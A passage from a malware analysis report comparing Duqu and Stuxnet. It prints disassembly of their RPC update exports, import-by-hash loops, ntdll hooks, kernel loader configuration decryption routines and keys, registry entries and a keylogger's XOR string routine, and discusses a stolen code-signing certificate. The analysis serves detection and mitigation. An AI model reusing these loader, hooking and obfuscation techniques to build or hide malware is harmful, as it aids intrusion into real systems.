.text:10001CE1 mov [ebp-4], al
.text:10001CE4 mov eax, esi
.text:10001CE6 push eax
.text:10001CE7 call each_export_calls_1002215A
.text:10001CEC
.text:10001CEC loc_10001CEC: ; DATA XREF: sub_10001D1E+12o
.text:10001CEC xor eax, eax
.text:10001CEE mov ecx, [ebp-0Ch]
.text:10001CF1 mov large fs:0, ecx
.text:10001CF8 pop edi
.text:10001CF9 pop esi
.text:10001CFA pop ebx
.text:10001CFB leave
.text:10001CFC retn
.text:10001CFD ; ---------------------------------------------------------------------------
.text:10001CFD
.text:10001CFD loc_10001CFD: ; CODE XREF: _27_RPCServer+3Dj
.text:10001CFD call sub_100193EA
.text:10001D02 lea eax, [ebp-11h]
.text:10001D05 push eax
.text:10001D06 call sub_10001E2D
.text:10001D0B push 1 ; dwExitCode
.text:10001D0D mov eax, dword_1006A840
.text:10001D12 call sub_10022379
.text:10001D17 push eax ; hLibModule
.text:10001D18 call ds:FreeLibraryAndExitThread
.text:10001D18 _27_RPCServer endp
Sample 8 – Export function _27 in oam7a.pnf (Stuxnet)
14 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Figure 6 – Cross references to library function RPCServerUnregisterIf in oam7a.pnf
15 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Figure 7 – Cross references to library function RPCServerUnregisterIf in netp191.pnf
Figure 6 and Figure 7 show the cross‐reference graph to the library function
RpcServerUnregisterIf. An obvious similarity between the two control flows is that in both
cases RpcServerUnregisterIf has two ingress edges, RPCStopServerListening_... and
CallRPCUnregisterIF_…. Furthermore, the number of function calls from the RPC server
export functions to the examined library function is three via CallRPCUnregisterIF_…
Furthermore, we identified that Duqu uses the same type of bindings as Stuxnet (see Sample
9 and Sample 10 for details).
.text:10006FB8 push ebp
.text:10006FB9 mov ebp, esp
.text:10006FBB and esp, 0FFFFFFF8h
.text:10006FBE push offset aRpcss ; "rpcss"
.text:10006FC3 call sub_10006FE0
.text:10006FC8 push offset aNetsvcs ; "netsvcs"
16 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. .text:10006FCD call sub_10006FE0
.text:10006FD2 push offset aBrowser ; "browser"
.text:10006FD7 call sub_10006FE0
.text:10006FDC mov esp, ebp
.text:10006FDE pop ebp
.text:10006FDF retn
Sample 9 – Duqu calls the RPC functions via three bindings, similarly to Stuxnet
.text:100197F1 push ebp
.text:100197F2 mov ebp, esp
.text:100197F4 and esp, 0FFFFFFF8h
.text:100197F7 push offset aRpcss ; "rpcss"
.text:100197FC call sub_10019819
.text:10019801 push offset aNetsvcs ; "netsvcs"
.text:10019806 call sub_10019819
.text:1001980B push offset aBrowser ; "browser"
.text:10019810 call sub_10019819
.text:10019815 mov esp, ebp
.text:10019817 pop ebp
.text:10019818 retn
Sample 10 – Stuxnet calls the RPC functions via three bindings
We also found many other correlations (e.g., the impersonation of anonymous tokens)
between the two RPC mechanisms. As a consequence, we conclude that Duqu uses the same
(or very similar) RPC logic as Stuxnet to update itself.
Unfortunately, we still could not dissect the exact mechanism of the remaining exports of
Duqu, but we suspect that they implement the same functionalities as the corresponding
exports of Stuxnet.
17 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
6. Import preparation by hashes/checksums
Both Stuxnet and Duqu uses the trick that some exports are prepared by looking up
checksums/hashes in particular DLL‐s and comparing the results instead of directly naming
the specific function (more info in case of Stuxnet driver is available in [ThabetMrxCls]
Chapter 3‐4.)
text:10001C41 push edi
.text:10001C42 push 790E4013h ; GetKernelObjectSecurity
.text:10001C47 mov [ebp+var_24], eax
.text:10001C4A mov [ebp+var_34], eax
.text:10001C4D call searchin_dll2_100022C7
.text:10001C52 mov edi, eax
.text:10001C54 mov [esp+10h+var_10], 0E876E6Eh ; GetSecurityDescriptorDacl
.text:10001C5B call searchin_dll2_100022C7
.text:10001C60 push 0E1BD5137h ; BuildExplicitAccessWithNameW
.text:10001C65 mov [ebp+var_C], eax
.text:10001C68 call searchin_dll2_100022C7
.text:10001C6D push 2F03FA6Fh ; SetEntriesInAclW
.text:10001C72 mov ebx, eax
.text:10001C74 call searchin_dll2_100022C7
.text:10001C79 push 0C69CF599h ; MakeAbsoluteSD
.text:10001C7E mov [ebp+var_4], eax
.text:10001C81 call searchin_dll2_100022C7
.text:10001C86 push 0CE8CAD1Ah ; SetSecurityDescriptorDacl
.text:10001C8B mov [ebp+var_8], eax
.text:10001C8E call searchin_dll2_100022C7
.text:10001C93 push 9A71C67h ; SetKernelObjectSecurity
.text:10001C98 mov [ebp+var_10], eax
.text:10001C9B call searchin_dll2_100022C7
.text:10002565 call sub_1000211F
.text:1000256A mov ecx, [ebp+var_4]
.text:1000256D mov [ecx], eax
.text:1000256F push 4BBFABB8h ; lstrcmpiW
.text:10002574 call searchin_dll1_100022B6
.text:10002579 pop ecx
.text:1000257A mov ecx, [ebp+var_4]
.text:1000257D mov [ecx+8], eax
.text:10002580 push 0A668559Eh ; VirtualQuery
.text:10002585 call searchin_dll1_100022B6
.text:1000258A pop ecx
.text:1000258B mov ecx, [ebp+var_4]
.text:1000258E mov [ecx+0Ch], eax
.text:10002591 push 4761BB27h ; VirtualProtect
.text:10002596 call searchin_dll1_100022B6
.text:1000259B pop ecx
.text:1000259C mov ecx, [ebp+var_4]
.text:1000259F mov [ecx+10h], eax
.text:100025A2 push 0D3E360E9h ; GetProcAddress
.text:100025A7 call searchin_dll1_100022B6
.text:100025AC pop ecx
.text:100025AD mov ecx, [ebp+var_4]
.text:100025B0 mov [ecx+14h], eax
.text:100025B3 push 6B3749B3h ; MapViewOfFile
.text:100025B8 call searchin_dll1_100022B6
.text:100025BD pop ecx
.text:100025BE mov ecx, [ebp+var_4]
.text:100025C1 mov [ecx+18h], eax
.text:100025C4 push 0D830E518h ; UnmapViewOfFile
.text:100025C9 call searchin_dll1_100022B6
.text:100025CE pop ecx
.text:100025CF mov ecx, [ebp+var_4]
.text:100025D2 mov [ecx+1Ch], eax
18 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. .text:100025D5 push 78C93963h ; FlushInstructionCache
.text:100025DA call searchin_dll1_100022B6
.text:100025DF pop ecx
.text:100025E0 mov ecx, [ebp+var_4]
.text:100025E3 mov [ecx+20h], eax
.text:100025E6 push 0D83E926Dh ; LoadLibraryW
.text:100025EB call searchin_dll1_100022B6
.text:100025F0 pop ecx
.text:100025F1 mov ecx, [ebp+var_4]
.text:100025F4 mov [ecx+24h], eax
.text:100025F7 push 19BD1298h ; FreeLibrary
.text:100025FC call searchin_dll1_100022B6
.text:10002601 pop ecx
.text:10002602 mov ecx, [ebp+var_4]
.text:10002605 mov [ecx+28h], eax
.text:10002608 push 5FC5AD65h ; ZwCreateSection
.text:1000260D call searchin_dll3_100022D8
.text:10002612 pop ecx
.text:10002613 mov ecx, [ebp+var_4]
.text:10002616 mov [ecx+2Ch], eax
.text:10002619 push 1D127D2Fh ; ZwMapViewOfSection
.text:1000261E call searchin_dll3_100022D8
.text:10002623 pop ecx
.text:10002624 mov ecx, [ebp+var_4]
.text:10002627 mov [ecx+30h], eax
.text:1000262A push 6F8A172Dh ; CreateThread
.text:1000262F call searchin_dll1_100022B6
.text:10002634 pop ecx
.text:10002635 mov ecx, [ebp+var_4]
.text:10002638 mov [ecx+34h], eax
.text:1000263B push 0BF464446h ; WaitForSingleObject
.text:10002640 call searchin_dll1_100022B6
.text:10002645 pop ecx
.text:10002646 mov ecx, [ebp+var_4]
.text:10002649 mov [ecx+38h], eax
.text:1000264C push 0AE16A0D4h ; GetExitCodeThread
.text:10002651 call searchin_dll1_100022B6
.text:10002656 pop ecx
.text:10002657 mov ecx, [ebp+var_4]
.text:1000265A mov [ecx+3Ch], eax
.text:1000265D push 0DB8CE88Ch ; ZwClose
.text:10002662 call searchin_dll3_100022D8
.text:10002667 pop ecx
.text:10002668 mov ecx, [ebp+var_4]
.text:1000266B mov [ecx+40h], eax
.text:1000266E push 3242AC18h ; GetSystemDirectoryW
.text:10002673 call searchin_dll1_100022B6
.text:10002678 pop ecx
.text:10002679 mov ecx, [ebp+var_4]
.text:1000267C mov [ecx+44h], eax
.text:1000267F push 479DE84Eh ; CreateFileW
.text:10002684 call searchin_dll1_100022B6
Sample 11 – netp191_res302 looking up imports in kernel32.dll
19 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
.text:10002197 mov ecx, [edx]
.text:10002199 add ecx, ebx
.text:1000219B mov al, [ecx]
.text:1000219D mov [ebp+var_8], 0F748B421h
.text:100021A4 test al, al
.text:100021A6 jz short loc_100021C3
.text:100021A8
.text:100021A8 loc_100021A8: ; CODE XREF: search_export_by_hash_1000214A+74j
.text:100021A8 mov ebx, [ebp+var_8]
.text:100021AB imul ebx, 0D4C2087h
.text:100021B1 movzx eax, al
.text:100021B4 xor ebx, eax
.text:100021B6 inc ecx
.text:100021B7 mov al, [ecx]
.text:100021B9 mov [ebp+var_8], ebx
.text:100021BC test al, al
.text:100021BE jnz short loc_100021A8
.text:100021C0 mov ebx, [ebp+arg_0]
.text:100021C3
.text:100021C3 loc_100021C3: ; CODE XREF: search_export_by_hash_1000214A+5Cj
.text:100021C3 mov eax, [ebp+var_8]
.text:100021C6 cmp [ebp+arg_4], eax ; compare argument magic to calculated hash
.text:100021C9 jz short loc_100021E0
.text:100021CB inc [ebp+var_4]
.text:100021CE mov eax, [ebp+var_4]
.text:100021D1 add edx, 4
.text:100021D4 cmp eax, [ebp+var_C]
.text:100021D7 jb short loc_10002197
Sample 12 – Search loop and checksum calculation in cmi4432_res302 import by hash/checksum
The checksum/hash calculation works on the export names without the terminating \0
character. A constant is loaded first, then for each character of the name of the export, an
imul is calculated over the partial hash and then the character is XORed to the result as
shown above.
While the trick of looking up import by hash is not unknown in malware code, this is another
similarity between Duqu and Stuxnet. Note that the checksum calculation seems to be
different between the two codes. Note also that many security related functions, such as
SetSecurityDescriptorDacl, are imported as seen in the sample above, which are most likely
related to the functionality of Stuxnet described in [SymantecDossier] (page 14).
For the DLLs used by Duqu, we calculated the hash results. To simplify the work of others we
uploaded the results to a publicly available web site, the download link is given in the
Download section of this document.
20 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
7. Hooks
The hook functions work in the same way for Stuxnet and Duqu. They both use non‐existent
“virtual” files for using libraries from modules.
In case of Duqu, this is sort151C.nls (or similar with random two byte hex string created from
the results of gettickcount() and process id) (Figure 8), while in case of Stuxnet it is
KERNEL32.DLL.ASLR.[HEXSTRING] or SHELL32.DLL.ASLR.[HEXSTRING], where HEXSTRING is a
two‐byte random hex string. When these libraries are requested, the corresponding module
is loaded into the address space of the process (see Figure 10 from [EsetMicroscope] for
more information).
Figure 8 – The hooks of Duqu and the non‐existent emulated file
21 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Figure 9 – The hooks of Stuxnet [EsetMicroscope]
Figure and Table show that both threats hook the same ntdll.dll functions.
Stuxnet Hook Duqu Hook
ZwMapViewOfSection ZwMapViewOfSection
ZwCreateSection ZwCreateSection
ZwOpenFile ZwOpenFile
ZwClose ZwClose
ZwQueryAttributesFile ZwQueryAttributesFile
ZwQuerySection ZwQuerySection
Table 5 – The hooked functions of ntdll.dll are exactly the same in both malware codes.
It is interesting, that antivirus programs do not detect this very strange functionality with
non‐existent files and from the events we suppose to do changes in this field. During the
injection Duqu maps read/write/execute memory areas to system processes like lsass.exe. It
is also very strange that anti‐malware tools generally avoid to check these memory areas
which are very rare to normal programs. So a general countermeasure might be to mitigate
these issues.
22 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
8. Payload and configuration encryption
Both jminet7.sys and cmi4432.sys are generic loaders for malware code, in a very similar
way as mrxcls.sys works in the case of Stuxnet. [Chappell 2010] discusses that the loader in
the case of the Stuxnet is so general that it can be used to load any malware. The case is the
same for Duqu components: both kernel drivers work in the same way so here we only
explain the jminet7.sys process.
The Windows boot up process starts jminet7.sys as it is defined in the registry in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\JmiNET3 (note the
difference between jminet7 and JmiNET3). As jminet7.sys starts, it loads some configuration
(Config 1) variables from the .sys file itself and decrypts it (Decrypt 1). The configuration
(Config 1) contains the name of the registry key, where the variable configuration part is
located, and the secret key to decrypt it. In our case, the “FILTER” key contains the
configuration (Config 2) in binary encrypted form. (In case of Stuxnet the process is the
same, but configuration (Config 2) is stored under the key “DATA”). Now, the loader,
jminet7.sys reads the registry and decrypts configuration (Config 2 / Decrypt 2). This
contains the name of the PNF file (DLL) and the process name where the file should be
injected. Then, after 15 minutes of waiting time (not yet known if it is configurable or hard‐
coded) jminet7.sys loads and decrypts netp191.pnf (Decrypt 3).
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\JmiNET3]
"Description"="JmiNET3"
"DisplayName"="JmiNET3"
"ErrorControl"=dword:00000000
"Group"="Network"
"ImagePath"="\\??\\C:\\WINDOWS\\system32\\Drivers\\jminet7.sys"
"Start"=dword:00000001
"Type"=dword:00000001
"FILTER"=hex:a0,35,58,da,32,ee,d5,01,c0,15,8b,1f,4b,5c,d1,a1,0b,8b,e7,85,1c,7f,\
6e,f2,ef,31,6a,18,3c,80,78,c7,d4,c5,50,90,7a,78,66,9d,6b,93,00,a1,f5,3d,26,\
ce,cb,1c,1e,45,b0,ff,a0,dd,c0,a3,e8,58,31,0c,b2,a1,dd,11,37,ba,aa,1e,66,d3,\
1f,b4,2f,e1,7c,eb,b6,a2,58,a0,25,62,77,b5,41,d3,71,02,1a,be,cb,bb,52,43,76,\
43,b6,d0,67,25,19,10,27,67,a5,15,38,9f,8f
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\JmiNET3\Enum]
"0"="Root\\LEGACY_JMINET3\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
Sample 13 – Registry data for jminet7
During the starting process 3 decryption processes are performed altogether, exactly as in
Stuxnet. Now, let’s compare the keys of the decryption operations.
23 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Description Key
Compiled ‐in configuration (Config‐1) No key set, fixed decryption routine
(essentially the same as key=0)
Variable configuration in registry (Config‐2) 0xAE240682 (loaded from Config‐ 1)
Decryption key for netp191.pnf 0xAE240682 (loaded from Config‐ 2)
Keys in the case of Duqu (jminet7 and cmi4432)
Description Key
Compiled ‐in configuration (Config‐1) key=0
Variable configuration in registry (Config‐2) 0xAE240682 (loaded from Config‐ 1)
Decryption key for oem7a.pnf 0x01AE0000 (loaded from Config‐ 2)
Keys in the case of Stuxnet (mrxcls.sys)
One can easily recognize that the same key is used in Stuxnet as in the case of Duqu. Note
that many keys contain “0xAE” and later we show more occurrences of this magic number.
24 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
0000000000: 07 00 00 00 82 06 24 AE │ 5C 00 52 00 45 00 47 00 • ' ♠$R\ R E G
0000000010: 49 00 53 00 54 00 52 00 │ 59 00 5C 00 4D 00 41 00 I S T R Y \ M A
0000000020: 43 00 48 00 49 00 4E 00 │ 45 00 5C 00 53 00 59 00 C H I N E \ S Y
0000000030: 53 00 54 00 45 00 4D 00 │ 5C 00 43 00 75 00 72 00 S T E M \ C u r
0000000040: 72 00 65 00 6E 00 74 00 │ 43 00 6F 00 6E 00 74 00 r e n t C o n t
0000000050: 72 00 6F 00 6C 00 53 00 │ 65 00 74 00 5C 00 53 00 r o l S e t \ S
0000000060: 65 00 72 00 76 00 69 00 │ 63 00 65 00 73 00 5C 00 e r v i c e s \
0000000070: 4A 00 6D 00 69 00 4E 00 │ 45 00 54 00 33 00 00 00 J m i N E T 3
0000000080: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
0000000090: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
00000000A0: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
00000000B0: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
00000000C0: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00
00000000D0: 46 00 49 00 4C 00 54 00 │ 45 00 52 00 00 00 6C 00 F I L T E R l
00000000E0: 00 00 00 00 5C 00 44 00 │ 65 00 76 00 69 00 63 00 \ D e v i c
00000000F0: 65 00 5C 00 7B 00 33 00 │ 30 00 39 00 33 00 41 00 e \ { 3 0 9 3 A
0000000100: 41 00 5A 00 33 00 2D 00 │ 31 00 30 00 39 00 32 00 A Z 3 - 1 0 9 2
0000000110: 2D 00 32 00 39 00 32 00 │ 39 00 2D 00 39 00 33 00 - 2 9 2 9 - 9 3
0000000120: 39 00 31 00 7D 00 00 00 │ 00 00 00 00 00 00 00 00 9 1 }
…
Sample 14 – Decrypted Config‐1 for Duqu from jminet7.sys, key in yellow
0000000000: 00 00 00 00 01 00 00 00 │ 10 BB 00 00 01 00 03 00 ☺ ►» ☺ ♥
0000000010: 82 06 24 AE 1A 00 00 00 │ 73 00 65 00 72 00 76 00 ' ♠$R→ s e r v
0000000020: 69 00 63 00 65 00 73 00 │ 2E 00 65 00 78 00 65 00 i c e s . e x e
0000000030: 00 00 38 00 00 00 5C 00 │ 53 00 79 00 73 00 74 00 8 \ S y s t
0000000040: 65 00 6D 00 52 00 6F 00 │ 6F 00 74 00 5C 00 69 00 e m R o o t \ i
0000000050: 6E 00 66 00 5C 00 6E 00 │ 65 00 74 00 70 00 31 00 n f \ n e t p 1
0000000060: 39 00 31 00 2E 00 50 00 │ 4E 00 46 00 00 00 D2 9 1 . P N F Ň
Sample 15 – Decrypted Config‐2 for Duqu jminet7.sys from registry
We can see that the decryption and configuration processes of Duqu and Stuxnet are very
similar. In both cases, the first decryption takes place just after the initialization of the driver,
before checking for Safe mode and kernel Debug mode. In Stuxnet, the decryption is the call
SUB_L00011C42, whereas in the case of Duqu it is the call SUB_L00011320 shown below.
Stuxnet’s 1st decryption call Duqu’s 1st decryption call
L000103E1:
mov byte ptr [L00014124],01h
mov dword ptr [ebp‐ 1Ch],L00013E80
L000103EF:
cmp dword ptr [ebp‐ 1Ch],L00013E84
jnc L00010409
mov eax,[ebp‐1Ch]
mov eax,[eax]
cmp eax,ebx
jz L00010403
call eax
L00010403:
add dword ptr [ebp‐ 1Ch],00000004h
jmp L000103EF
L00010409:
xor eax,eax
L0001040B:
cmp eax,ebx
jnz L000104BA L000105C4:
mov byte ptr [L00015358],01h
mov esi,L00015180
L000105D0:
mov [ebp‐ 1Ch],esi
cmp esi,L00015184
jnc L000105E8
mov eax,[esi]
test eax,eax
jz L000105E3
call eax
L000105E3:
add esi,00000004h
jmp L000105D0
L000105E8:
xor eax,eax
L000105EA:
test eax,eax
jnz L00010667
25 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. mov al,[L00013E98]
test al,al
jz L00010433
xor eax,eax
mov esi,00000278h
mov ecx,L00013E99
call SUB_L00011C42
mov [L00013E98],bl
L00010433:
mov eax,[L00013E99]
test al,01h
jz L0001044C
mov eax,[ntoskrnl.exe!InitSafeBootMode]
cmp [eax],ebx
jz L0001044C mov edi,[ebp+0Ch]
call SUB_L00011320
mov eax,[L00015190]
test al,01h
jz L00010611
mov ecx,[ntoskrnl.exe!InitSafeBootMode]
Why does the decryption of the configuration (Config‐1) happen before the checks for Safe
Mode and kernel debugging? The reason is probably that the behavior of the malware upon
the detection of Safe Mode or kernel debugging is configurable; hence it needs the
configuration (Config‐1) before the checking. The last bit of the first byte of the configuration
(L00013E99 in Stuxnet listing above) controls if the malware should be active during safe
mode or not, and if the 7th bit controls the same if kernel mode debugging is active. Duqu
implements the same functionality with almost the same code.
An important difference between the Stuxnet and the Duqu decryption calls is that in the
case of Stuxnet calling the same subroutine does all three decryptions.
In the case of Duqu, the first decryption calls a slightly different routine, where the
instruction mov ecx, 08471122h is used as shown below. For the other two decryption calls,
this instruction is changed to XOR ecx, 08471122h. Thus, in the first case, ecx is a fixed
decryption key, and in the other two cases, ecx contains a parameter received from the call.
Stuxnet decryption routine Duqu decryption routine
SUB_L00011C42:
push ebp
mov ebp,esp
sub esp,00000010h
mov edx,eax
xor edx,D4114896h
xor eax,A36ECD00h
mov [ebp‐ 04h],esi
shr dword ptr [ebp‐ 04h],1
push ebx
mov [ebp‐ 10h],edx
mov [ebp‐ 0Ch],eax
mov dword ptr [ebp‐ 08h],00000004h
push edi SUB_L00011320:
push esi
mov ecx,08471122h
xor esi,esi
jmp L00011330
Align 8
L00011330:
xor [esi+L00015190],cl
ror ecx,03h
mov edx,ecx
imul edx,ecx
mov eax,1E2D6DA3h
mul edx
mov eax,ecx
26 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. L00011C6A:
xor edx,edx
test esi,esi
jbe L00011C87
mov al,[ebp‐ 0Ch]
imul [ebp‐ 08h]
mov bl,al
L00011C78:
mov al,[ebp‐ 10h]
imul dl
add al,bl
xor [edx+ecx],al
inc edx
cmp edx,esi
jc L00011C78
L00011C87:
xor eax,eax
cmp [ebp‐ 04h],eax
jbe L00011CA2
lea edx,[esi+01h]
shr edx,1
lea edi,[edx+ecx]
L00011C96:
mov dl,[edi+eax]
xor [eax+ecx],dl
inc eax
cmp eax,[ebp‐04h]
jc L00011C96
L00011CA2:
lea eax,[esi‐01h]
jmp L00011CAF
L00011CA7:
mov dl,[eax+ecx ‐01h]
sub [eax+ecx],dl
dec eax
L00011CAF:
cmp eax,00000001h
jnc L00011CA7
dec [ebp‐ 08h]
jns L00011C6A
pop edi
pop ebx
leave
retn imul eax,04747293h
shr edx,0Ch
lea edx,[edx+eax+01h]
add esi,00000001h
xor ecx,edx
cmp esi,000001ACh
jc L00011330
mov ax,[L00015198]
test ax,ax
pop esi
jnz L00011382
movzx ecx,[edi]
mov edx,[edi+04h]
push ecx
push edx
push L00015198
call jmp_ntoskrnl.exe!memcpy
add esp,0000000Ch
L00011382:
retn
Sample 16 – Decryption routine comparison
27 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
It is very hard to precisely characterize the similarities of the kernel driver codes of Duqu and
Stuxnet. In the screenshot below, we present the registry loaders, and the decrypting part of
the two. They are very similar, but there are clear differences. It is clearly interesting, but as
we don’t have enough expertise, it would be just mere speculation from us to say which
code is originated from which code, or if one code is based on the reverse‐ engineering of the
other, or, at the end, it is also possible that someone wanted to write a Stuxnet‐ alike clone
and he/she wanted to us to believe that the authors have relations.
Figure 10 – registry loader and decrypting part. Left: Stuxnet – Right: Duqu loader
28 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
9. PNF config file encryption
In case of Stuxnet, a PNF file, mdmcpq3dd.pnf contains configuration information that is
used by the payload (injected DLL), e.g. it contains the names of the Command & Control
servers. This file in our Stuxnet sample is 6619 bytes long, and the first part of the
configuration is encrypted by simple XOR with 0xFF. The last half of the configuration seems
to be encrypted by different means.
In Duqu, the configuration file is encrypted by XOR operations with the 7‐byte key (0x2b
0x72 0x73 0x34 0x99 0x71 0x98), the file is 6750 bytes long. Its content is not yet fully
analyzed; it mainly contains strings about the system itself, but not the name of a C&C
server.
After decryption, Duqu checks if the file begins with 09 05 79 AE in hex (0xAE790509 as
integer). We can thus observe another occurrence of the magic number AE. Note that
Stuxnet’s config file mdmcpq3.pnf also begins with this magic number. Interestingly, the
routine in Duqu also checks if the fifth byte is 0x1A. Moreover, at position 0xC, the
decrypted config file repeats the size of the file itself (0x1A5E), where in case of Stuxnet, this
size parameter only refers to the size of the first part of the configuration file (0x744 = 1860
bytes)
29 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
10. Comparison of cmi4432.sys and jminet7.sys
One could ask what is the difference between cmi4432.sys and jminet7.sys? The main
difference is of course the digital signature. jminet7.sys is not signed, and thus, it is shorter.
If we remove the digital signature from cmi4432.sys we find that both files are 24 960 bytes
long.
A basic binary comparison discovers only very tiny differences between the two codes. 2‐3
bytes are different in the header part, but then the code section is totally identical. The
encrypted configuration sections inside the drivers are slightly different (as we know they
contain references to different registry services). Finally, at the end of the driver binaries,
the driver descriptive texts are different due to the references to JMicron and XXXXX as
authors.
In summary, we can conclude that jminet7.sys and cmi4432.sys are essentially identical,
except for the identifiers and the digital signature. In addition, from their functionality we
can assert that cmi4432.sys is a malware loader routine, so the digital signature on it cannot
be intentional (by the manufacturer).
11. Code signing and its consequence
Digital signatures are used to assert the identity of the producer of software and the
integrity of the code. Code signing is used to prevent untrusted code from being executed.
Duqu’s cmi4432.sys is signed by XXXXX with a certificate that is still valid at the time of this
writing (see related Figures).
XXXXX's parent in the trust chain is Verisign Inc., the certificate was issued on 2009.08.03, it
uses the SHA1 hash function (it's not MD5 which has known weaknesses), and it belongs to
Class 3 certificates that provide a highest security level requiring for example physical
presence at the enrollment. The timestamp is set to 1899.12.30, which probably signifies
that no timestamp was given at the time of signing.
Apparent similarities with the Stuxnet malware suggest that the private key of XXXXX might
have been compromised and this calls for immediate revocation of their certificate
invalidating the public key. Interestingly, in the Stuxnet case it was speculated that an
insider's physical intrusion led to the compromise of the private keys of the involved
hardware manufacturer companies RealTek and JMicron as they were both located in
30 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Hsinchu Science and Industrial Park, Hsinchu City, Taiwan. Although the current compromise
still affects a company in Taiwan, it is located in Taipei. There is no evidence for a large‐scale
compromise of Taiwanese hardware manufacturers, but the recurrence of events is at least
suspicious.
Immediate steps are needed to mitigate the impact of the malware. Similar to the Stuxnet
case, the certificate of XXXXX needs to be revoked and XXXXX’s code‐signing process must be
thoroughly audited by Verisign Inc. or any other top‐level CA that would issue a new
certificate for XXXXX. Revocation of the compromised certificate mitigates the spreading of
the malware, because Windows does not allow new installations of the driver with a
revoked certificate. This does not solve the problem completely, because already installed
drivers may keep running.
In the following pages we include some screenshots showing the digital signature on the
affected malware kernel rootkit driver. In one of the figures, we also show that Windows
stated that the certificate was still valid on October 5, 2011 with recent revocation
information.
Figure 11 – New CMI4432 rootkit loader with valid digital signature from XXXX,TW. Screenshot printed on
October 5, 2011.
31 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
12. Other components
12.1. Keylogger
No direct network communication was observed from the keylogger.
We checked the binary against virus scanner databases on some online tools. Interestingly,
for GFI somebody already submitted the sample before we obtained a sample for the
keylogger:
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=85625782&cs=F61AFBECF2457
197D1B724CB78E3276E
In recent weeks, many virus scanners enlisted the software in their malware database.
32 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
.text:00401B96 xorcryptor_b31f_at_401b96 proc near ; CODE XREF: sub_401C86+13p
.text:00401B96 ; loadsomemodule_401CE4+13p ...
.text:00401B96
.text:00401B96 addr_ciphertext = dword ptr 4
.text:00401B96 addr_target = dword ptr 8
.text:00401B96
.text:00401B96 mov edx, [esp+addr_ciphertext]
.text:00401B9A test edx, edx
.text:00401B9C jnz short loc_401BA8
.text:00401B9E mov ecx, [esp+addr_target]
.text:00401BA2 xor eax, eax
.text:00401BA4 mov [ecx], ax
.text:00401BA7 retn
.text:00401BA8 ; ---------------------------------------------------------------------------
.text:00401BA8
.text:00401BA8 loc_401BA8: ; CODE XREF: xorcryptor_b31f_at_401b96+6j
.text:00401BA8 mov eax, [esp+addr_target]
.text:00401BAC push edi
.text:00401BAD mov ecx, 0B31FB31Fh
.text:00401BB2 jmp short loc_401BC1
.text:00401BB4 ; ---------------------------------------------------------------------------
.text:00401BB4
.text:00401BB4 loc_401BB4: ; CODE XREF: xorcryptor_b31f_at_401b96+34j
.text:00401BB4 cmp word ptr [eax+2], 0
.text:00401BB9 jz short loc_401BCC
.text:00401BBB add edx, 4
.text:00401BBE add eax, 4
.text:00401BC1
.text:00401BC1 loc_401BC1: ; CODE XREF: xorcryptor_b31f_at_401b96+1Cj
.text:00401BC1 mov edi, [edx]
.text:00401BC3 xor edi, ecx
.text:00401BC5 mov [eax], edi
.text:00401BC7 test di, di
.text:00401BCA jnz short loc_401BB4 ; String is terminated by 00 characters, that stops
decryption
.text:00401BCC
.text:00401BCC loc_401BCC: ; CODE XREF: xorcryptor_b31f_at_401b96+23j
.text:00401BCC pop edi
.text:00401BCD retn
.text:00401BCD xorcryptor_b31f_at_401b96 endp
Sample 17 – B3 1F XOR encryption routine from keylogger
1000E4D1 L1000E4D1:
1000E4D1 8B442408 mov eax,[esp+08h]
1000E4D5 57 push edi
1000E4D6 B91FB31FB3 mov ecx,B31FB31Fh
1000E4DB EB0D jmp L1000E4EA
1000E4DD L1000E4DD:
1000E4DD 6683780200 cmp word ptr [eax+02h],0000h
1000E4E2 7411 jz L1000E4F5
1000E4E4 83C204 add edx,00000004h
1000E4E7 83C004 add eax,00000004h
1000E4EA L1000E4EA:
1000E4EA 8B3A mov edi,[edx]
1000E4EC 33F9 xor edi,ecx
1000E4EE 8938 mov [eax],edi
1000E4F0 6685FF test di,di
1000E4F3 75E8 jnz L1000E4DD
1000E4F5 L1000E4F5:
1000E4F5 5F pop edi
1000E4F6 C3 retn
Sample 18 – B3 1F XOR encryption routine from cmi4432.pnf
33 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
v9 = pNumArgs;
if ( pNumArgs > 1 && !lstrcmpiW(*(LPCWSTR *)(commandlineparam + 4), L"xxx") )
{
v22 = 2;
while ( v22 < v9 )
{
v4 = 0;
if ( !check_options_sub_4013AE((int)&v22, v9, commandlineparam, (int)&v14) )
goto LABEL_13;
}
if ( createfile_stuff((int)&v14) && tempfile_eraser((int)&v14) && sub_401160((int)&v14, (int)&Memory,
(int)&v22) )
{
if ( sub_401269(Memory, v22) )
{
v10 = 1;
v4 = 0;
goto LABEL_14;
}
v4 = 0;
}
}
LABEL_13:
